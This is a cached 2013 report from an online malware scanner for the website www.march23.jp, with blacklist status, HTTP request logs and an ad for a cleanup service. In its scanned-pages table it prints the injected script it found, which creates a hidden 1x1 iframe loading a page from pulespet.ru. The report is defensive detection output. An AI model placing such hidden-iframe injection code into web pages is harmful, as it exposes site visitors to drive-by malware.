Online Malware Scanner report for www.march23.jp
www.march23.jp
(cached results from Sun Jul 7 18:16:47 2013 rescan)
Website Malware
Cleaning & Monitoring
Malware cleaning service from eVuln team.
- Website cleaning
- Redirects removal
- Log files inspection
- Reason eliminating
- Blacklists removal
- One year monitoring
- Repeated fixing
$119.00
- Malicious/Suspicious/Total urls checked
- 1/0/3
1 page has malicious code. See details below
- Blacklists
- Found
The website is marked by Google as suspicious.
The website "www.march23.jp" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here are our suggestions how to fix this.
The website "www.march23.jp" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here are our suggestions how to fix this.
- Malicious redirects
- OK
- Malicious/Hidden/Total iFrames
- 0/0/0
- Deface / Content modification
- OK
Setup daily monitoring of www.march23.jp
Paste the following HTML code anywhere into "www.march23.jp" website.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=www.march23.jp
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.march23.jp/ | 200 OK Content-Length: 11558 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: pulespet.ru function zzzfff() { var txzga = document.createElement('iframe'); txzga.src = 'http://pulespet.ru/count30.php'; txzga.style.position = 'absolute'; txzga.style.border = '0'; txzga.style.height = '1px'; txzga.style.width = '1px'; txzga.style.left = '1px'; txzga.style.top = '1px'; if (!document.getElementById('txzga')) { document.write('<div id=\'txzga\'></div>'); document.getElementById('txzga').appendChild(txzga); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(to ...[680 bytes skipped]... | ||
http://www.march23.jp/Scripts/swfobject_modified.js | 404 Not Found Content-Length: 13 Content-Type: text/html | clean |
http://www.march23.jp/test404page.js | 404 Not Found Content-Length: 13 Content-Type: text/html | clean |
Malicious redirects
First query (normal visit):
GET / HTTP/1.1
Host: www.march23.jp
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 07 Jul 2013 15:16:48 GMT
Accept-Ranges: bytes
ETag: "325dcb-2d26-51d7c64e"
Server: Apache
Content-Length: 11558
Content-Type: text/html
Last-Modified: Sat, 06 Jul 2013 07:25:02 GMT
...11558 bytes of data.
GET / HTTP/1.1
Host: www.march23.jp
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 07 Jul 2013 15:16:48 GMT
Accept-Ranges: bytes
ETag: "325dcb-2d26-51d7c64e"
Server: Apache
Content-Length: 11558
Content-Type: text/html
Last-Modified: Sat, 06 Jul 2013 07:25:02 GMT
...11558 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: www.march23.jp
Referer: http://www.google.com/search?q=www.march23.jp
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: www.march23.jp
Referer: http://www.google.com/search?q=www.march23.jp
Result:
The result is similar to the first query. There are no suspicious redirects found.